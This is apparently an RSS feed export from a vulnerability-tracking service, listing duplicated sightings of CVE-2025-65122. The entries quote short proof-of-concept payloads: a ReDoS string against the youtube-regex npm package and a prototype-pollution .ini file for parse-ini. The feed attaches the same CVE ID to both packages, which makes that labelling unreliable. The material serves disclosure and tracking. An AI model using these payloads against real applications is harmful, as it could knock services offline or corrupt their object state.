Most recent sightings.

Most recent sightings. https://vulnerability.circl.lu Contains only the most 10 recent sightings. http://www.rssboard.org/rss-specification python-feedgen en Sun, 10 May 2026 09:45:28 +0000 f51c6e0c-c3cf-422a-9b0b-127a547f185a https://vulnerability.circl.lu/sighting/f51c6e0c-c3cf-422a-9b0b-127a547f185a/export {"uuid": "f51c6e0c-c3cf-422a-9b0b-127a547f185a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://gist.github.com/6en6ar/66ef99397068c0a5e0d963bc47d7172c", "content": "Product: https://github.com/regexhq/youtube-regex\nVersion: v1.0.5\nVulnerability type: Regex Denial of Service\nCVE ID: CVE-2025-65122\n\nDescription: \nThe regex on line 11. in index.js contains a Regex denial\nof service when large input is provided. It takes longer\namount of time to process larger strings because regex will\ntry to backtrack each time it encounters watch?-.\n\nPayload used:\n\nvar youtubeRegex = require('youtube-regex');\nconst startTime = performance.now() let payload = 'youtube.com/' + 'watch?m'.repeat(30000) + '\\t' // contains youtube url address \n//youtubeRegex().test('unicorn youtube.com/watch?v=0EWbonj7f18');\nyoutubeRegex().test(payload);\nconst endTime = performance.now() console.log(`Time spent: ${endTime - startTime} milliseconds`)", "creation_timestamp": "2026-05-06T19:39:33.000000Z"} {"uuid": "f51c6e0c-c3cf-422a-9b0b-127a547f185a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://gist.github.com/6en6ar/66ef99397068c0a5e0d963bc47d7172c", "content": "Product: https://github.com/regexhq/youtube-regex\nVersion: v1.0.5\nVulnerability type: Regex Denial of Service\nCVE ID: CVE-2025-65122\n\nDescription: \nThe regex on line 11. in index.js contains a Regex denial\nof service when large input is provided. It takes longer\namount of time to process larger strings because regex will\ntry to backtrack each time it encounters watch?-.\n\nPayload used:\n\nvar youtubeRegex = require('youtube-regex');\nconst startTime = performance.now() let payload = 'youtube.com/' + 'watch?m'.repeat(30000) + '\\t' // contains youtube url address \n//youtubeRegex().test('unicorn youtube.com/watch?v=0EWbonj7f18');\nyoutubeRegex().test(payload);\nconst endTime = performance.now() console.log(`Time spent: ${endTime - startTime} milliseconds`)", "creation_timestamp": "2026-05-06T19:39:33.000000Z"} https://vulnerability.circl.lu/sighting/f51c6e0c-c3cf-422a-9b0b-127a547f185a/export Wed, 06 May 2026 19:39:33 +0000 8cff9b3e-fff3-4268-afc3-b66f3715107c https://vulnerability.circl.lu/sighting/8cff9b3e-fff3-4268-afc3-b66f3715107c/export {"uuid": "8cff9b3e-fff3-4268-afc3-b66f3715107c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://gist.github.com/6en6ar/bdc8e0d472406ab98431f10273cbdbf3", "content": "Product: https://www.npmjs.com/package/parse-ini\nVersion: v1.0.6\nVulnerability type: Prototype Pollution inside parse-ini npm package through version 1.0.6\nCVE ID: CVE-2025-65122\n\nDescription: \nThere exists a prototype pollution vulnerability in parse-ini npm package, more specifically on lines 101. and 104 inside index.js() \nwhere the code does not check for presence of attacker controlled prototypes that can be supplied inside .ini files.\nPrototype pollution enables attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects,\nthat can lead to code execution or denial of service in certain scenarios.\n\nPayload used:\n\nvar parser = require('parse-ini');\nvar iniObj = parser.parse('file.ini');\nconsole.log(iniObj.__proto__); //polluted\nconsole.log({}.polluted)//polluted\nconsole.log(iniObj.MySectionName.lastUsed);\n>\nPayload used(file.ini):\n\n; file.ini\nvariable1 = value1\n{MySectionName]\nlastUsed=3\n[__proto__]\npolluted = \"polluted\"", "creation_timestamp": "2026-05-06T19:46:52.000000Z"} {"uuid": "8cff9b3e-fff3-4268-afc3-b66f3715107c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://gist.github.com/6en6ar/bdc8e0d472406ab98431f10273cbdbf3", "content": "Product: https://www.npmjs.com/package/parse-ini\nVersion: v1.0.6\nVulnerability type: Prototype Pollution inside parse-ini npm package through version 1.0.6\nCVE ID: CVE-2025-65122\n\nDescription: \nThere exists a prototype pollution vulnerability in parse-ini npm package, more specifically on lines 101. and 104 inside index.js() \nwhere the code does not check for presence of attacker controlled prototypes that can be supplied inside .ini files.\nPrototype pollution enables attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects,\nthat can lead to code execution or denial of service in certain scenarios.\n\nPayload used:\n\nvar parser = require('parse-ini');\nvar iniObj = parser.parse('file.ini');\nconsole.log(iniObj.__proto__); //polluted\nconsole.log({}.polluted)//polluted\nconsole.log(iniObj.MySectionName.lastUsed);\n>\nPayload used(file.ini):\n\n; file.ini\nvariable1 = value1\n{MySectionName]\nlastUsed=3\n[__proto__]\npolluted = \"polluted\"", "creation_timestamp": "2026-05-06T19:46:52.000000Z"} https://vulnerability.circl.lu/sighting/8cff9b3e-fff3-4268-afc3-b66f3715107c/export Wed, 06 May 2026 19:46:52 +0000 2049ee5c-6aef-4b67-9903-6b6431e37df2 https://vulnerability.circl.lu/sighting/2049ee5c-6aef-4b67-9903-6b6431e37df2/export {"uuid": "2049ee5c-6aef-4b67-9903-6b6431e37df2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://bsky.app/profile/thehackerwire.bsky.social/post/3mlbpa66hni2z", "content": "\ud83d\udfe0 CVE-2025-65122 - High (7.5)\n\nRegex Denial of Service in youtube-regex npm package through version 1.0.5.\n\nhttps://www.thehackerwire.com/vulnerability/CVE-2025-65122/\n\n#infosec #cybersecurity #CVE #vulnerability #security #patchstack", "creation_timestamp": "2026-05-07T17:06:16.113213Z"} {"uuid": "2049ee5c-6aef-4b67-9903-6b6431e37df2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://bsky.app/profile/thehackerwire.bsky.social/post/3mlbpa66hni2z", "content": "\ud83d\udfe0 CVE-2025-65122 - High (7.5)\n\nRegex Denial of Service in youtube-regex npm package through version 1.0.5.\n\nhttps://www.thehackerwire.com/vulnerability/CVE-2025-65122/\n\n#infosec #cybersecurity #CVE #vulnerability #security #patchstack", "creation_timestamp": "2026-05-07T17:06:16.113213Z"} https://vulnerability.circl.lu/sighting/2049ee5c-6aef-4b67-9903-6b6431e37df2/export Thu, 07 May 2026 17:06:16 +0000